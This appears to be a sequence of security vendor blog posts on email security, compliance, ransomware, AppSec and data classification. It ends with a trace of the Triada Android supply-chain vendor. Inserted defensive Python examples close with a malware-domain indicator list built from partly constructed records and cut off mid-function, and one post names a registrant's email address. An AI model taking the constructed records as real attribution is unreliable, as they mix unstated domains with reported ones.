Once the sender has composed an email and sent it, an email server is ready to receive and process it. The email server is a computer application listening on port 25 (non-encrypted), 465 (SSL/TLS) or 587 (STARTTLS). It receives the email from the sender and forwards it for delivery. All outgoing emails are placed in a mail queue, and in parallel the SMTP server queries the DNS server for the recipient domain’s MX record to find out where the receiver’s email server is located. Once it finds the IP address of the recipient email server, it sends the composed message to that IP. For example, the MX record for xyz.com might point to mail1.xyz.com.

While the email is in the queue, the SMTP server looks up the MX record and validates the recipient. If the server is not able to process the email, it places it in a deferred queue: delivery is not attempted immediately but retried a few times after a delay before a failure notification is sent back to the client. If the email is validated and intended for local delivery, it is handed over to the local delivery agent; if it is intended for remote delivery, the server contacts other mail servers for relaying.

If the email is intended for remote delivery, it is relayed to an MTA. The MTA is a software application that relays email from one node to another using the SMTP protocol. The MTA receives the email from another MTA or from an MUA. After receiving the email, it adds a “Received” header at the top of the message headers and relays it to the next MTA for further delivery. It is also known as the relaying agent of email. For each mail, the MTA keeps track of every step it performs and analyzes the list of recipients to decide the routing actions. It sends a non-delivery response when a message does not reach its intended destination. Exim and Postfix are examples of open source MTAs.

The MDA is a software application that takes mail from the MTA and is responsible for delivering that email to the receiver’s mailbox. Upon final delivery, the Return-Path field is added to the message to keep a record of the return path (the envelope sender). Some popular open source MDAs are Dovecot and Fetchmail.

On the receiving side, the MUA fetches the email from a POP3 server or an IMAP server and loads it from the user’s mailbox into the email client (e.g. Thunderbird, Outlook).

A POP3 server listens on the following ports:

  • Port 110 – Post Office Protocol for non-encrypted mail.
  • Port 995 – Post Office Protocol over SSL/TLS.

An IMAP server listens on the following ports:

  • Port 143 – Internet Message Access Protocol for non-encrypted mail.
  • Port 993 – Internet Message Access Protocol over SSL/TLS.

In a nutshell, the Mail Transport Agent (MTA), such as Postfix or Exim, is responsible for sending email to the correct destination and handing the mail over to the MDA.

The Mail Delivery Agent (MDA), such as Dovecot or Fetchmail, receives mail from the MTA and places it in the user’s mailbox. (Dovecot supports the POP3 and IMAP protocols along with MDA functionality.)

The Mail User Agent (MUA), such as Thunderbird or Outlook, is the email client that fetches the email from the user’s mailbox and presents it to the user.

1.2 Security/Protection of Email server:

1.2.1 Scanning for threats

Scanning emails before they reach the organization’s email server protects the organization from malicious activity. Proper scanning for viruses, spam, spyware, Trojan horses, phishing, worms and ransomware must be carried out. Email security/protection devices provide the facility to scan email files for the above threats.

1.2.2 Blacklisting of domain/email address

Blacklisting email domains and email addresses helps an organization avoid receiving email from known malicious addresses or domain names.

1.2.3 Data leak prevention (DLP)

DLP helps an organization prevent the leakage of sensitive or confidential information. Security devices check mail at the gateway against the administrator’s customized policies and accept or reject it accordingly. Notifying administrators of such activity is an added advantage.

1.2.4 Content based blocking

Sometimes inappropriate content may flow through email. Applying policies to inbound and outbound mail for file types, extension matching, keyword matching, and expression matching in both the email body and attachments reduces the flow of such content.

1.2.5 Encrypted communication over SSL/TLS

Transport Layer Security (TLS) can be used to encrypt email in transit between servers and clients. Email sent in plain text can be intercepted and read by anyone on the network path.

1.2.6 Verification of sender

To maintain integrity in email communication, the sender should be a verified, legitimate entity. Pretty Good Privacy (PGP) lets you digitally sign and encrypt a message, so the recipient can check that the email arriving in the mailbox came from the claimed sender and has not been tampered with.

Last but not least, employee training also helps to reduce threats coming to or from the organization. A few points that can be included in training:

  • Never open links from unknown senders; report them to your manager/admin.
  • Do not open an attachment from an unknown sender; report it to your manager/admin. If a mail is from a known sender but looks suspicious, confirm with the sender before opening it.
  • Avoid connecting to and accessing your email from public, non-secure Wi-Fi connections.
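The header bookkeeping described in section 1.1 (the Received header each MTA prepends, the Return-Path the MDA writes on final delivery) is what a defender reads when deciding whether a message is what it claims to be, and it also shows whether each hop used the TLS recommended in section 1.2.5. The following Python example is added here and is not part of the Seqrite post; the two sample messages, hostnames and addresses are constructed for illustration.

```python
import email
import re
from email.utils import parseaddr

# "from <host> ... by <host> ... with <protocol>": the fields each MTA writes into the
# Received header it prepends while relaying. Whitespace is normalised before matching.
RECEIVED_RE = re.compile(
    r"from\s+(?P<from>\S+).*?\bby\s+(?P<by>\S+)(?:.*?\bwith\s+(?P<with>\S+))?",
    re.IGNORECASE,
)

# Constructed sample: one plain submission hop, one TLS relay hop, one local LMTP hop.
SAMPLE_OK = """\
Return-Path: <alice@example.net>
Received: from mx.example.com (mx.example.com [192.0.2.20])
    by mda.example.com with LMTP id 3; Mon, 24 Jun 2019 10:00:03 +0000
Received: from relay.example.net (relay.example.net [192.0.2.10])
    by mx.example.com with ESMTPS id 2 (TLSv1.2); Mon, 24 Jun 2019 10:00:02 +0000
Received: from [198.51.100.5] (alice-laptop) by relay.example.net with ESMTPA id 1;
    Mon, 24 Jun 2019 10:00:01 +0000
From: Alice <alice@example.net>
To: bob@example.com
Subject: constructed sample

Hello Bob.
"""

# Constructed sample: the visible From does not match the envelope sender domain.
SAMPLE_SPOOFED = """\
Return-Path: <bulk@mailer.example.org>
Received: from bulk.example.org (bulk.example.org [203.0.113.9])
    by mx.example.com with ESMTP id 9; Mon, 24 Jun 2019 11:00:00 +0000
From: Alice <alice@example.net>
To: bob@example.com
Subject: constructed sample

Please review.
"""


def used_tls(protocol):
    """ESMTPS/ESMTPSA (and anything naming TLS) mean the hop was encrypted; ESMTP/ESMTPA was not."""
    p = protocol.upper()
    return p.startswith(("ESMTPS", "SMTPS")) or "TLS" in p

def delivery_path(raw_message):
    """Return the hops in the order the mail travelled (oldest first). Each MTA adds its
    Received header at the top, so the header list is reversed to recover the route."""
    msg = email.message_from_string(raw_message)
    hops = []
    for value in reversed(msg.get_all("Received", [])):
        text = re.sub(r"\s+", " ", value).strip()  # unfold the header
        m = RECEIVED_RE.search(text)
        if not m:
            hops.append({"from": None, "by": None, "with": "", "tls": False, "raw": text})
            continue
        protocol = m.group("with") or ""
        hops.append({"from": m.group("from"), "by": m.group("by"), "with": protocol,
                     "tls": used_tls(protocol), "raw": text})
    return hops

def cleartext_hops(raw_message):
    """Names of the relays ('by' hosts) that accepted the message without TLS."""
    return [h["by"] for h in delivery_path(raw_message) if not h["tls"]]

def _domain(header_value):
    return parseaddr(header_value)[1].rpartition("@")[2].lower()

def return_path_mismatch(raw_message):
    """True when the Return-Path (envelope sender, written at final delivery) is in a
    different domain from the From header the user sees; a common phishing tell.
    Both headers absent compares equal and is reported as no mismatch."""
    msg = email.message_from_string(raw_message)
    return _domain(msg.get("Return-Path", "")) != _domain(msg.get("From", ""))

if __name__ == "__main__":
    for hop in delivery_path(SAMPLE_OK):
        print(f"{hop['from']} -> {hop['by']} via {hop['with'] or '?'} tls={hop['tls']}")
    print("cleartext hops:", cleartext_hops(SAMPLE_OK))
    print("spoofed sample mismatch:", return_path_mismatch(SAMPLE_SPOOFED))
```

Received headers below the first one written by your own gateway are supplied by the remote side and can be forged, so only the hops added by servers you control are trustworthy evidence.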

The post Email technology and its security in nutshell appeared first on Seqrite Blog.

Data security and the legal sector – ISO 27001 for law firms

With the legal sector reporting an increase in targeted attacks in 2018, information security management remains a serious issue for law firms. The confidential information and large volumes of client funds they hold are highly desirable to cyber criminals, so it’s not surprising that 60% of law firms reported that they suffered a security incident last year (PwC Law Firms’ Survey 2018).

With increased levels of cyber attacks, information security must be a priority. While a cyber criminal or terrorist organisation may be held off by firewalls and intrusion detection systems, these systems cannot manage the intricacies of business relationships or global trade. As such, a security regime focused solely on technology will fail.

Tackle cyber threats head on with ISO 27001

Leading law firms are implementing ISO/IEC 27001:2013 (ISO 27001), the international standard for information security, to tackle cyber threats head on. Management teams can safeguard their firm by employing a best-practice ISMS (information security management system) and certifying to ISO 27001.

ISO 27001 certification is increasingly demanded of law firms when tendering for major projects. Achieving accredited certification to ISO 27001 will put law firms in the running for these tenders and demonstrates that they are committed to protecting their clients’ confidential data, offering a powerful, visible assurance of their commitment to meeting obligations to clients and business partners.

In addition to severe fines, cyber security and data protection failures also risk seriously damaging a firm’s reputation. Having the correct measures in place will protect a firm’s credibility, minimise risk and maintain the level of trust that clients deserve.

Support with your ISO 27001 project

Whether you are just getting started, preparing a business case for ISO 27001, or your project is already underway, we encourage you to read our new green paper ISO 27001 for Law Firms. It outlines the benefits of ISO 27001 and stresses the importance of stringent data security in the legal sector.

For further support with your firm’s ISO 27001 project, complete an enquiry form to contact our experts or call our team on +44 (0)333 800 7000 to discuss your firm’s requirements.

The post Data security and the legal sector – ISO 27001 for law firms appeared first on IT Governance Blog.

Catch a Ride Via Wearable

More often than not, commuters and travelers alike want to get to their destination quickly and easily. The advent of wearable payments helps make this a reality, as passengers don’t have to pull out a wallet or phone to pay for entry. Adding to that, users are quickly adopting wearable technology that has this payment technology embedded, causing transportation systems to take notice and adopt corresponding technology as a result. Unfortunately, there’s a chance this rapid adoption may catch the eye of cybercriminals as well.

Just last month, the New York City Subway system introduced turnstiles that open with a simple wave of a wearable, like an Apple Watch or Fitbit. Wearables may provide convenience and ease, but they also provide an open door to cybercriminals. With more connections to secure, there are more vectors for vulnerabilities and potential cyberthreats. This is especially the case with wearables, which often don’t have security built-in from the start.

App developers and manufacturers are hard-pressed to keep up with innovation, so security isn’t always top of mind, which puts user data at risk. As one of the most valuable things cybercriminals can get ahold of, the data stored on wearables can be used for a variety of purposes. These threats include phishing, gaining access to online accounts, or transferring money illegally. While the possibility of these threats looms, the adoption of wearables shows no sign of slowing down, with an estimated 1.1 billion in use by 2022. This means developers, manufacturers, and users need to work together in order to keep these handy gadgets secure and cybercriminals out.

Both consumers and transport systems need to be cautious of how wearables can be used to help, or hinder, us in the near future. Rest assured, even if cybercriminals utilize this technology, McAfee’s security strategy will continue to keep pace with the ever-changing threat landscape. In the meantime, consider these tips to stay secure while traveling to your destination:

  • Always keep your software and apps up to date. It’s a best practice to update software and apps when prompted to help fix vulnerabilities when they’re found.
  • Add an extra layer of security. Since wearables connect to smartphones, if it becomes infected, there is a good chance the connected smartphone will be impacted as well. Invest in comprehensive mobile security to apply to your mobile devices to stay secure while on-the-go.
  • Clear your data cache. As previously mentioned, wearables hold a lot of data. Be sure to clear your cache every so often to ensure it doesn’t fall into the wrong hands.
  • Avoid storing critical information. Social Security Numbers (SSN), bank account numbers, and addresses do not need to be stored on your wearable. And if you’re making an online purchase, do so on a laptop with a secure connection.
  • Connect to public Wi-Fi with caution. Cybercriminals can use unsecured public Wi-Fi as a foothold into a wearable. If you need to connect to public Wi-Fi, use a virtual private network, or VPN, to stay secure.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

The post Catch a Ride Via Wearable appeared first on McAfee Blogs.

The $1.5 Million Email

Ransomware has been around since the late 1980s, but in recent years, it has emerged as one of the largest financial threats facing the public and private sector alike. According to the U.S. Department of Homeland Security, ransomware is the fastest-growing malware threat—and according to a report by Recorded Future in May, more than 170 state and local governments have been the victims of ransomware attacks since 2013.

In addition to improved ransomware capabilities, such as military-grade encryption algorithms, two key factors have emboldened cybercriminals to launch such attacks: the rise of hard-to-trace cryptocurrency such as Bitcoin, and the tendency of unprepared targets to continue meeting scammers’ demands, even as these demands become increasingly audacious.

One such target was the city of Riviera Beach, Fla., a waterfront suburb north of Palm Beach, which recently paid a near-record 65 Bitcoins to a gang of hackers after a ransomware attack brought the city to a halt.

On May 29, a city employee opened an email containing a piece of malware, which quickly infected nearly every city computer network. With the municipal computer system held hostage, all operations were hobbled—everything from the city’s website, email server and VoIP phones to the water utility pump stations. 911 dispatchers were forced to take down caller information on paper, employees and vendors had to be paid with paper checks, utility payments could only be accepted by snail mail or in person, and police officers had to resort to digging through closets at headquarters to find paper traffic citation pads.

City leaders were told they could make all of these problems go away—if they simply complied with the ransomers’ demand to remit 65 bitcoin (roughly $600,000) in exchange for the decryption key.

While the city had originally decided not to pay the ransom—opting instead to invest $914,000 into purchasing hundreds of new desktop and laptop computers and other hardware in an attempt to circumvent the issue—these measures ultimately failed. Three weeks after the original attack, based on the advice of an outside security consulting firm, the city council met to discuss next steps—and unanimously decided, after just two minutes of discussion, to acquiesce. The total cost, including the unbudgeted-for hardware, the consultation, and of course, the ransom itself, amounted to more than $1.5 million. For a city of just 35,000 residents, the cost was staggering, even after insurance paid its percentage.

While Riviera Beach was among the latest targets, it certainly won’t be the last, or the largest—according to a 2018 Deloitte-NASCIO survey, nearly half of states lack a separate cybersecurity budget, and a majority allocate under 3% of IT budgets to cyberthreat prevention.

But with ransomware attacks continuing to unleash a post-internet world on any unsuspecting target at any time, many targets are finding that, as much as they thought they lacked the resources to prevent such attacks, they’re even less prepared for the aftermath. Once infected, they’re left with two unsavory options: Pay the ransom, knowing that there’s no guarantee the hackers will decrypt the systems or that they’ll be decrypted perfectly. And even if they are, there are still the moral implications: When governments pay such ransoms, they’re not only putting taxpayer dollars directly into the hands of criminals, they’re also encouraging future ransomware attacks. The alternative, of course, is to try to rebuild…often from the ground up.

While cyberinsurance policies can give the illusion of protection, this solution will likely become less viable as the frequency of attacks continues to rise and the amount demanded continues to skyrocket. The goal, then, becomes for companies, government entities and individuals to prepare for and prevent these attacks before they’re targeted. While large-scale legislative solutions, such as outlawing the payment of ransomware demands, may eventually offer some relief, here are some steps that companies, individuals and government entities can take right now to prevent being victims:

  1. Learn: Resources such as NoMoreRansom.org—an initiative created by the National High Tech Crime Unit of Netherlands, Europol’s European Cybercrime Centre, and McAfee—aim to provide prevention education and help ransomware victims retrieve their encrypted data without having to pay criminals.
  2. Educate: When it comes to ransomware, knowing isn’t half the battle—it’s the entire battle. When millions of dollars hinge on your employees’ decision whether or not to open an email, organization-wide training on how to spot malicious emails and social engineering schemes may pay for itself many, many times over.
  3. Backup: There’s no reason to pay criminals to decrypt your data if you have access to a copy. Frequently back up essential data, ideally storing it both locally and on the cloud.
  4. Update: Always downloading the newest version of your operating system or apps helps you stay ahead of threats.
  5. Defend: Sufficiently robust security solutions can protect you from known threats as well as those that have not yet been formally detected.

The post The $1.5 Million Email appeared first on McAfee Blogs.

Key Components to Consider When Kicking Off Your Veracode AppSec Program

I’ve been working as a Veracode security program manager since 2013, and have adopted AppSec best practices in those six years that contribute to successful AppSec programs. I started my journey here as a program manager and was fortunate enough to manage and lead some of Veracode’s largest and most complex customer programs. Today, I’m managing a team of program managers.

In this blog, I will walk through four key components to consider when kicking off your program with Veracode. These are all components I’ve implemented when managing large programs, and which have led to AppSec success by helping organizations understand what’s needed in order to have a successful, well-functioning application security program.  

Customer Engagement

The first component is Veracode customer engagement. You might be thinking, “of course, this is a given,” but in some cases I’ve seen (more so in the past), it’s not. The No. 1 roadblock with the customers I’ve seen struggle has been lack of engagement. An established security team (on the client side) who can act as the liaison between the development organization and Veracode is very important. In some cases, increasingly so with the DevSecOps push, dev management is involved as well.

When I first began my journey with Veracode, security didn’t exist at many organizations, so an engaged team also didn’t exist. Today, when I go on-site and meet with my customers, I frequently thank them. I thank them for their dedication and engagement level, because without the primary, day-to-day contacts, it would be more difficult to get the necessary traction. At Veracode, we say it’s a team effort. Identifying a team that is willing and eager to work with their Veracode contacts is the No. 1 step toward success. This is also the team or individual who can act as a Veracode advocate, work with the Veracode SPM to tackle Veracode initiatives, and be an internal presence that helps drive and motivate, making security No. 1 so that our clients’ customers are confident they’re using secure products and applications.

Cross-Functional Communication

My second on the list is cross-functional communication. It is imperative for a program to have cross-functional communication between the security team and main teams involved, including executives and the development organization. Communicating policy mandates, remediation plans, and automation plans across all functions, including developers and DevOps teams, early on in the program, is going to put a program ahead. Understanding what the best communication method is in order to circulate important plans across teams, whether it’s through email or a newsletter, and who should be delivering it, should be well thought out. Veracode Program Management acts as an extension of our customers’ teams and, therefore, can help with messaging and delivery.  

Ultimately, communication will prevent confusion and promote awareness, which is important to the health of a program. When a developer is introduced to security scanning requirements or remediation plans later in the development lifecycle, it can affect release dates. The team will be in a much better position if they know early on what they’re responsible for and when, and any consequences if they do not incorporate security into their SDLC.

Application Inventory

Next is application inventory, which is another major component. This is a list of your organization’s high-risk applications, those most critical to the business that could impact company brand or reputation if breached, or it could be a list of all applications in the organization. If you do not know this information early on, it could cause delays when kicking off a program.

We recommend companies scan all their applications. However, many organizations start their programs with a baseline of only their high-risk applications. If you fall into this category, having that list ready and sharing it with your Veracode Security Program Manager will keep everyone in alignment. Your SPM will provide a list of the important information needed when gathering application inventory information, and prior to setting up application profiles in the Veracode platform.

Program Strategy

Finally, once you’ve identified your team, have a communication plan in place, and have created an application inventory, the next step is to map out program strategy. This is where your Veracode SPM will have a discovery session with you and your team to discuss the future of the program and obtain key information to ensure success. He or she will also review the critical activities that need to take place in the security program to keep it on track. Additionally, the SPM will review measurable metrics with you and discuss which metrics are key to the organization and its teams in order to track program success down the road. The SPM will handle the operational effort to get you there and report back regularly to ensure that you are achieving your organizational goals through those metrics.

The SPM will ask several questions to help develop and kick off your program, including:

  • Details about your SDLC environment, development tools, and systems the development teams are using. This is imperative as the push to shift left and toward DevSecOps is a major focus for many organizations today. The end goal is to fully automate your application security program, because automating and integrating security into your CI/CD pipeline will make for a seamless program that will save you and your developers time and money.
  • Identifying development teams and setting onboarding schedules. Training users on how to use the Veracode platform will help immensely with developer adoption and awareness. Veracode provides training and always offers flexible schedules to accommodate developers globally.
  • Establishing a remediation process and workflow. The end goal is to bring down those very high and high flaws to get you closer to being compliant with your organization’s policies and standards.

Lastly, we will have discussions around automation and integration into your CI/CD pipeline. As mentioned, this will save time for developers by streamlining the scanning process through automation and having them consume Veracode scan results in their environment, rather than manually running scans and reviewing results in the UI.
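As an added example (not Veracode’s own code, and not its result format), here is the kind of policy gate the automation discussion above describes: a pipeline step that reads scan results and fails the build when open Very High or High flaws exceed the organization’s thresholds. The JSON shape and the `payments-api` findings are constructed for the example.

```python
"""Policy gate for application security scan results in a CI/CD pipeline.

Added example, not Veracode's own code and not its result format: the JSON
below is a constructed, hypothetical export (a list of findings with a
severity and a status). The gate fails the build when open findings exceed
the organization's thresholds, so developers see the failure where they work.
"""
import json
from collections import Counter

# Constructed sample export (hypothetical shape, not a real scanner's output).
SAMPLE_RESULTS = json.dumps({
    "application": "payments-api",
    "findings": [
        {"id": 1, "severity": "Very High", "cwe": 89, "status": "open"},
        {"id": 2, "severity": "High", "cwe": 79, "status": "open"},
        {"id": 3, "severity": "High", "cwe": 79, "status": "fixed"},
        {"id": 4, "severity": "Medium", "cwe": 200, "status": "open"},
        {"id": 5, "severity": "Low", "cwe": 312, "status": "mitigated"},
    ],
})

# Organizational policy: maximum number of OPEN findings allowed per severity.
# Severities not listed are counted but do not block the build.
DEFAULT_POLICY = {"Very High": 0, "High": 0}


def count_open_by_severity(results_json):
    """Count findings that are still open, grouped by severity."""
    data = json.loads(results_json)
    counts = Counter()
    for finding in data.get("findings", []):
        if finding.get("status") == "open":
            counts[finding["severity"]] += 1
    return dict(counts)


def evaluate_policy(results_json, policy=DEFAULT_POLICY):
    """Return (passed, violations); violations maps severity -> (open, allowed)."""
    open_counts = count_open_by_severity(results_json)
    violations = {}
    for severity, allowed in policy.items():
        actual = open_counts.get(severity, 0)
        if actual > allowed:
            violations[severity] = (actual, allowed)
    return (not violations, violations)


def gate_exit_code(results_json, policy=DEFAULT_POLICY):
    """Exit code for the pipeline step: 0 passes the build, 1 blocks it."""
    passed, violations = evaluate_policy(results_json, policy)
    if passed:
        print("policy check passed")
        return 0
    for severity, (actual, allowed) in violations.items():
        print(f"policy violation: {actual} open {severity} finding(s), "
              f"{allowed} allowed")
    return 1


if __name__ == "__main__":
    import sys
    sys.exit(gate_exit_code(SAMPLE_RESULTS))
```

Run it as the last step of the scan stage; the non-zero exit code is what stops the pipeline, so the developer sees the policy violation in the build log rather than in a separate UI.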

Whether you’re an existing customer or a potential customer, if all of these items are checked off at the beginning, then you will be on the right path to kick-starting a robust application security program that everyone at your organization will be on board with.

Learn More

Get more details on maturing your application security program in our guide, Everything You Need to Know About Maturing Your Application Security Program.

And you can always get valuable tips and advice on managing AppSec from other Veracode customers in our Community.

3 strategies for building an information protection program

Five years ago, we started on a journey to update and simplify information protection at Microsoft. We had a manual data classification process that our users didn’t use effectively and that didn’t work with our data storage or database technology. We had to find ways to re-classify data and build effective tools while protecting our most important assets: customer and employee information.

We’ve learned a lot about data protection and tools and today we’re sharing some of our best practices for:

  • Laying the groundwork for protecting information.
  • Protecting trade secrets.
  • Starting your information protection journey.

Laying the groundwork for protecting information

Identifying the location of data—The first step to creating a strategy is discovering where your data and major storage places are so you can create a data landscape. Do you have data on your endpoints? Start by looking across your organization to identify your customer data, regulatory data, and other sensitive information.

Classifying the data—Classifying data is the most important and most difficult step. At Microsoft, we used a custom three-level manual label classification process but found that no one understood how to apply them correctly. We worked with legal, HR, and other groups to identify labels that made sense for our company with a goal that they could be applied automatically.

Our objective is to ensure that our data and our customer data is handled properly, classified correctly, and is protected. We’re a global company and the General Data Protection Regulation (GDPR) is the baseline—and one of our key tenets—for how we think about our information and how we protect it. We replaced the manual classification labels with a more intuitive labeling taxonomy that better aligns with industry standards:

  • Non-Business: Data that is non-business related and doesn’t belong to Microsoft.
  • Public: Data designed for public consumption.
  • General: Business data not meant for public consumption.
  • Confidential: Sensitive business data that could cause business harm if over-shared.
  • Highly Confidential: Very sensitive business data that would certainly cause the business harm if over-shared.

Identifying and resolving old data—Before you roll out new tools, there may be old data that you need to review and resolve. For example, you may need to clean up, delete, or protect your data. When reviewing data, consider the age of the data and if anyone is still using a document. Prioritize and create rules for saving, deleting, and protecting data.

Protecting the data—You want to protect the data based on classification. Protecting customer and personal information is at the core of what we’re trying to protect at Microsoft. For smaller companies—or companies just starting to develop an information protection program—your biggest return will be finding customer data so you can protect it. Building customer trust and protecting customer information is key to an information protection program.
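The taxonomy above and the goal of applying labels automatically translate into code roughly like this added example (not Microsoft’s tooling; the detection rules, the `example.com` organization domain and the sharing policy are constructed assumptions). It recommends a label from content patterns, only ever raising the label, and then lets the label alone decide whether a document may leave the organization.

```python
"""Automatic label recommendation and label-based sharing decisions.

Added example, not Microsoft's tooling. It uses the five-label taxonomy from
the post, ordered from least to most sensitive. The detection rules are
constructed and deliberately simple (hypothetical); real products ship their
own classifiers. The point is the shape: content patterns only ever raise a
label, never lower it, and the label alone drives the protection action.
"""
import re

LABELS = ["Non-Business", "Public", "General", "Confidential", "Highly Confidential"]
RANK = {label: i for i, label in enumerate(LABELS)}


def luhn_ok(number):
    """Luhn checksum, used to reject digit runs that merely look like card numbers."""
    digits = [int(c) for c in number if c.isdigit()]
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:  # double every second digit from the right
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


# Constructed rules: (name, pattern, minimum label, optional validator).
RULES = [
    ("email address", re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.-]+\b"), "Confidential", None),
    ("card number", re.compile(r"\b(?:\d[ -]?){13,16}\b"), "Highly Confidential", luhn_ok),
    ("ssn-like id", re.compile(r"\b\d{3}-\d{2}-\d{4}\b"), "Highly Confidential", None),
    ("trade secret marker", re.compile(r"\btrade secret\b", re.I), "Highly Confidential", None),
]


def recommend_label(text, current="General"):
    """Return the label the content warrants, never lower than the current one."""
    best = RANK[current]
    for _name, pattern, label, validator in RULES:
        for match in pattern.finditer(text):
            if validator is not None and not validator(match.group()):
                continue  # pattern matched but the validator rejected it (false positive)
            best = max(best, RANK[label])
    return LABELS[best]


def sharing_decision(label, recipient_domain, org_domain="example.com"):
    """Decide what happens when a labeled document is sent to a recipient.

    Returns (allowed, action). Constructed policy: Highly Confidential never
    leaves the organization and is encrypted inside it; Confidential is
    encrypted when it goes outside; everything else is allowed as-is.
    """
    external = recipient_domain.lower() != org_domain.lower()
    if label == "Highly Confidential":
        return (not external, "block" if external else "encrypt")
    if label == "Confidential":
        return (True, "encrypt" if external else "allow")
    return (True, "allow")
```

The Luhn check is the kind of detail that decides whether users trust automatic labels: a 16-digit order reference that fails the checksum stays at General instead of being pushed to Highly Confidential, while a valid card number is always raised.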

Protecting trade secrets

Protecting our identities is an extremely important part of the information protection journey. But what if you come across a document with trade secret information? You should probably work with the group that handles trade secrets at your company. We have a white glove program with HR where we build specific programs for specific business units. Using products like Key Vault can help protect sensitive data.

Starting your information protection journey

If you’re just starting to build an information protection program, we recommend the following three-step process:

  1. Governance, risk, and compliance—Have your legal and HR teams help you define the types of information you need to defend. Always focus on customer data and sensitive information.
  2. Education and awareness—Labels are always important because they’re the foundation for identifying the difference between confidential and general business data. Use terminology that’s easy for users to understand. Train them and use tools to implement your solutions. We used education campaigns, and we also built tool tips and Rights Management Service (RMS) templates into our products. For example, if I’m working in an Office experience, I might get a tool tip prompting me to classify a document as confidential. We found that 50 percent of the time, users will increase the confidentiality of the document.
  3. Tools rollout—When you’re working with tools, remember that you’re typically interacting with customer and employee information. It’s an opportunity to build trust as a company. Some of the information protection tools we use include Office 365 Information Protection and Azure Information Protection, which provide labeling functionality we can push to endpoints, as well as labels and tool tips for Office documents. We also use the file share scanner and Windows Information Protection (which is still in pilot phase).

Building an information protection program is not one-size-fits-all, but if you choose classification terms that are easy to understand and implement, proactively educate users, and bake information protection into existing processes to minimize impact, you can increase the success of the program.

For more information about how Microsoft has implemented these strategies, watch the IT Showcase webinar, Speaking of security: Information protection.

The post 3 strategies for building an information protection program appeared first on Microsoft Security.

Tracing the Supply Chain Attack on Android

Earlier this month, Google disclosed that a supply chain attack by one of its vendors resulted in malicious software being pre-installed on millions of new budget Android devices. Google didn’t exactly name those responsible, but said it believes the offending vendor uses the nicknames “Yehuo” or “Blazefire.” What follows is a deep dive into the identity of that Chinese vendor, which appears to have a long and storied history of pushing the envelope on mobile malware.

“Yehuo” is Mandarin for “wildfire,” so one might be forgiven for concluding that Google was perhaps using another dictionary than most Mandarin speakers. But Google was probably just being coy: The vendor in question appears to have used both “blazefire” and “wildfire” in two of many corporate names adopted for the same entity.

An online search for the term “yehuo” reveals an account on the Chinese Software Developer Network which uses that same nickname and references the domain blazefire[.]com. More searching points to a Yehuo user on gamerbbs[.]cn who advertises a mobile game called “Xiaojun Junji,” and says the game is available at blazefire[.]com.

Research on blazefire[.]com via Domaintools.com shows the domain was assigned in 2015 to a company called “Shanghai Blazefire Network Technology Co. Ltd.” just a short time after it was registered by someone using the email address “tosaka1027@gmail.com“.

The Shanghai Blazefire Network is part of a group of similarly-named Chinese entities in the “mobile phone pre-installation business and in marketing for advertisers’ products to install services through mobile phone installed software.”

“At present, pre-installed partners cover the entire mobile phone industry chain, including mobile phone chip manufacturers, mobile phone design companies, mobile phone brand manufacturers, mobile phone agents, mobile terminal stores and major e-commerce platforms,” reads a descriptive blurb about the company.

A historic records search at Domaintools on that tosaka1027@gmail.com address says it was used to register 24 Internet domain names, including at least seven that have been conclusively tied to the spread of powerful Android mobile malware.

Two of those domains registered to tosaka1027@gmail.com — elsyzsmc[.]com and rurimeter[.]com — were implicated in propagating the Triada malware. Triada is the very same malicious software Google said was found pre-installed on many of its devices and being used to install spam apps that display ads.

In July 2017, Russian antivirus vendor Dr.Web published research showing that Triada had been installed by default on at least four low-cost Android models. In 2018, Dr.Web expanded its research when it discovered the Triada malware installed on 40 different models of Android devices.

At least another five of the domains registered to tosaka1027@gmail.com — 99youx[.]com, buydudu[.]com, kelisrim[.]com, opnixi[.]com and sonyba[.]com — were seen as early as 2016 as distribution points for the Hummer Trojan, a potent strain of Android malware often bundled with games that completely compromises the infected device.
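The pivot the post performs by hand, from registrant email to domain cluster to overlap with known malware domains, looks like this as an added example (not code from the post or from DomainTools). The records are constructed for the example: they reuse only the domains, registrant addresses and organization names the post cites, and the threat-intel mapping is the post’s own Triada and Hummer attribution; the `unrelated-example[.]test` record is a control.

```python
"""Registrant pivot over historical domain registration records.

Added example, not code from the post or from DomainTools. The records below
are constructed for the example: they reuse the domains, registrant email
addresses and organization names given in the post, but the record ordering
is a placeholder and nothing else about them is real data. The technique is
the one the post walks through by hand: cluster domains by the registrant
email in their history, intersect with domains already tied to malware, and
surface the rest of the cluster as related infrastructure worth watching.
"""
from collections import defaultdict


def refang(indicator):
    """Turn a defanged indicator such as 'elsyzsmc[.]com' into a plain domain."""
    return indicator.replace("[.]", ".").strip().lower()


def defang(domain):
    """Defang a domain for safe display in reports."""
    return domain.replace(".", "[.]")


# Constructed history: (domain, registrant email, registrant organization).
# An empty field means that record did not expose the value.
RECORDS = [
    ("blazefire[.]com", "tosaka1027@gmail.com", ""),
    ("blazefire[.]com", "", "Shanghai Blazefire Network Technology Co. Ltd."),
    ("2333youxi[.]com", "tosaka1027@gmail.com", ""),
    ("2333youxi[.]com", "", "Shanghai Blazefire Network Technology Co. Ltd."),
    ("elsyzsmc[.]com", "tosaka1027@gmail.com", ""),
    ("rurimeter[.]com", "tosaka1027@gmail.com", ""),
    ("99youx[.]com", "tosaka1027@gmail.com", ""),
    ("blazefire[.]net", "yehuo@blazefire.net", "Shanghai Blazefire Network Technology Co"),
    ("unrelated-example[.]test", "someone@example.test", ""),  # control record
]

# Threat intelligence: domains the post reports as malware distribution points.
KNOWN_MALWARE = {
    "elsyzsmc.com": "Triada",
    "rurimeter.com": "Triada",
    "99youx.com": "Hummer",
}


def cluster_by_registrant(records):
    """Map each registrant email to the sorted list of domains in its history."""
    clusters = defaultdict(set)
    for domain, email, _org in records:
        if email:
            clusters[email.lower()].add(refang(domain))
    return {email: sorted(domains) for email, domains in clusters.items()}


def orgs_for_domain(records):
    """Map each domain to the organizations that ever appeared in its history."""
    orgs = defaultdict(set)
    for domain, _email, org in records:
        if org:
            orgs[refang(domain)].add(org)
    return {domain: sorted(names) for domain, names in orgs.items()}


def pivot_report(records, known_malware):
    """Per registrant email: its domains and which of them threat intel flags."""
    report = {}
    for email, domains in cluster_by_registrant(records).items():
        flagged = {d: known_malware[d] for d in domains if d in known_malware}
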